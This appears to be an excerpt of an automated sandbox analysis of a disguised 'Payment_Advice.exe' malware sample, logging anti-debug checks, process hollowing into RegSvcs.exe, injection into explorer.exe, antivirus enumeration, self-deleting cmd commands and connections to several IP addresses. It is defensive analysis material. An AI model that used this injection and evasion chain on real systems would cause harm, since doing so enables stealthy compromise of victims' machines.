          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_0175CBF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_016FEBFC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8BF0 mov eax, dword ptr fs:[00000030h]14_2_016D8BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0BCD mov eax, dword ptr fs:[00000030h]14_2_016D0BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F0BCB mov eax, dword ptr fs:[00000030h]14_2_016F0BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EBD0 mov eax, dword ptr fs:[00000030h]14_2_0177EBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784BB0 mov eax, dword ptr fs:[00000030h]14_2_01784BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01784BB0 mov eax, dword ptr fs:[00000030h]14_2_01784BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0BBE mov eax, dword ptr fs:[00000030h]14_2_016E0BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0BBE mov eax, dword ptr fs:[00000030h]14_2_016E0BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174CA72 mov eax, dword ptr fs:[00000030h]14_2_0174CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0174CA72 mov eax, dword ptr fs:[00000030h]14_2_0174CA72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0177EA60 mov eax, dword ptr fs:[00000030h]14_2_0177EA60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA6F mov eax, dword ptr fs:[00000030h]14_2_0170CA6F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0A5B mov eax, dword ptr fs:[00000030h]14_2_016E0A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016E0A5B mov eax, dword ptr fs:[00000030h]14_2_016E0A5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D6A50 mov eax, dword ptr fs:[00000030h]14_2_016D6A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016FEA2E mov eax, dword ptr fs:[00000030h]14_2_016FEA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA38 mov eax, dword ptr fs:[00000030h]14_2_0170CA38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170CA24 mov eax, dword ptr fs:[00000030h]14_2_0170CA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F4A35 mov eax, dword ptr fs:[00000030h]14_2_016F4A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016F4A35 mov eax, dword ptr fs:[00000030h]14_2_016F4A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0175CA11 mov eax, dword ptr fs:[00000030h]14_2_0175CA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170AAEE mov eax, dword ptr fs:[00000030h]14_2_0170AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0170AAEE mov eax, dword ptr fs:[00000030h]14_2_0170AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01704AD0 mov eax, dword ptr fs:[00000030h]14_2_01704AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01704AD0 mov eax, dword ptr fs:[00000030h]14_2_01704AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D0AD0 mov eax, dword ptr fs:[00000030h]14_2_016D0AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01726ACC mov eax, dword ptr fs:[00000030h]14_2_01726ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_016D8AA0 mov eax, dword ptr fs:[00000030h]14_2_016D8AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051F838
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0052C030 GetProcessHeap,0_2_0052C030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00409AA0 rdtsc 14_2_00409AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040ACE0 LdrLoadDll,14_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001EF3FF BlockInput,6_2_001EF3FF
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0051F838
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051F9D5 SetUnhandledExceptionFilter,0_2_0051F9D5
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_0051FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0051FBCA
          Source: C:\Users\user\Desktop\Payment_Advice.exeCode function: 0_2_00528EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00528EBD
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_001A29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_001A29B2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00190BCF
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190D65 SetUnhandledExceptionFilter,6_2_00190D65
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmpCode function: 6_2_00190FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00190FB1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A56EC0 SetUnhandledExceptionFilter,16_2_00A56EC0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_00A56B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00A56B40

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 77.222.40.147 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.96.160.140 80
          Source: C:\Windows\explorer.exe | Network Connect: 170.33.13.246 80
          Source: C:\Windows\explorer.exe | Network Connect: 142.234.186.98 80
          Source: C:\Windows\explorer.exe | Network Connect: 103.224.182.242 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.19 80
          Source: C:\Windows\explorer.exe | Network Connect: 62.72.50.244 80
          Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_3_010DD91A CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\cmd.exe base address: A40000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EA8008
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 4084
          Source: C:\Windows\SysWOW64\cmd.exe | Thread register set: target process: 4084
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Code function: 6_2_001DBB02 SendInput,keybd_event
          Source: C:\Users\user\Desktop\Payment_Advice.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pis-e.vbe"
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ewdbwwfpdh.bmp fjrpidauk.jpg
          Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp ewdbwwfpdh.bmp fjrpidauk.jpg
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ewdbwwfpdh.bmp | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000829D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
          Source: Payment_Advice.exe, 00000000.00000003.1414188164.000000000829D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: for $objantivirusproduct in $colitems
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ( wj(,wj
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ,dwj,pwj
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 0hwj0twj
          Source: Payment_Advice.exe, 00000000.00000003.1417523916.0000000005A54000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |8xjarbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptro
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: occw7
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: occw7
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: cwdfqw
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: [qw8-
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dl*t-l1
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: tem32\kernelbase.dll
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: pi-ms-win-core-processthreads-l1-1-0;
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ws\sys
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ~cw`qz
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\wd
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: c:\windows\s5
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ft`qz
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: wow64
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: l;cw4fqw
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: occw2
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: occw2 @
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: d{gw@
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dd{gw@
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: dw4`3x
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ebw`3x
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: cbw/v
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: ]qw]qw
          Source: Payment_Advice.exe, 00000000.00000002.1550342568.000000000385F000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: gfw`\bw
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: !this program cannot be run in dos mode.
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: rich<>
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: .text
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: `.rdata
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: `.rdata
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @.data
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @@.data g
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: .didat
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: .rsrc
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: .rsrcx
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @.reloc
          Source: Payment_Advice.exe, 00000000.00000000.1370322475.0000000000500000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: @@.reloc<#
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xewpnew
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: xewpnew'
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: mmonpro
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @uprog3
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @uprog33
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gram files (x86)\common files
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: commonprogramw6432=c:\program files\common files
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: computername=hubert-pc
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: comspec=c:\win"
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gram files (x86)\common filescommonprogramw6432=c:\program files\common filescomputername=user-pccomspec=c:\win""
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d.exe
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: driverdata=c:\windows\system32\drivers\driverdata
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fps_browser_app_profile_string=internet explorer
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fps_browser_use
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d.exedriverdata=c:\windows\system32\drivers\driverdatafps_browser_app_profile_string=internet explorerfps_browser_use
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: users\user
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: localappdata=c:\users\user\appdata\local
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: logonserver=\\user-pc
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: number_o
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: users\userlocalappdata=c:\users\user\appdata\locallogonserver=\\user-pcnumber_o
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: srive
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: os=windows_nt
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: path=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: sriveos=windows_ntpath=c:\program files (x86)\common files\oracle\java\javapath;c:\windows\
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\api
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ows;c:\windows\system32\wbem;c:\windows\system32\windowspowershell\v1.0\;c:\windows\system32\openssh\;c:\users\user\apii
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: osoft\windowsapps;
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.msc
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processor_architecture=x86
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processor_arx
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: osoft\windowsapps;pathext=.com;.exe;.bat;.cmd;.vbs;.vbe;.js;.jse;.wsf;.wsh;.mscprocessor_architecture=x86processor_arxx
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r=intel64 family 6 model 143 stepping 8, genuineintel
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processor_level=6
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: processor_revision=8f08
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: progg
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: r=intel64 family 6 model 143 stepping 8, genuineintelprocessor_level=6processor_revision=8f08proggg
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: abcdefghijklmnopqrstuvwxyz
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: abcdefghijklmnopqrstuvwxyz
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: allusersprofile=c:\programdata
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: appdata=c:\users\user\appdata\roaming
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: commonprogramfiles=c:\program files (x86)\common files
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: commonprogramfiles(x86)=c:\program files (x86)\common files
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: comspec=c:\windows\system32\cmd.exe
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: fps_browser_user_profile_string=default
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: homedrive=c:
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: homepath=\users\user
          Source: Payment_Advice.exe, 00000000.00000002.1550372008.00000000038F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: number_of_processors=2memstr_9107fcba-a
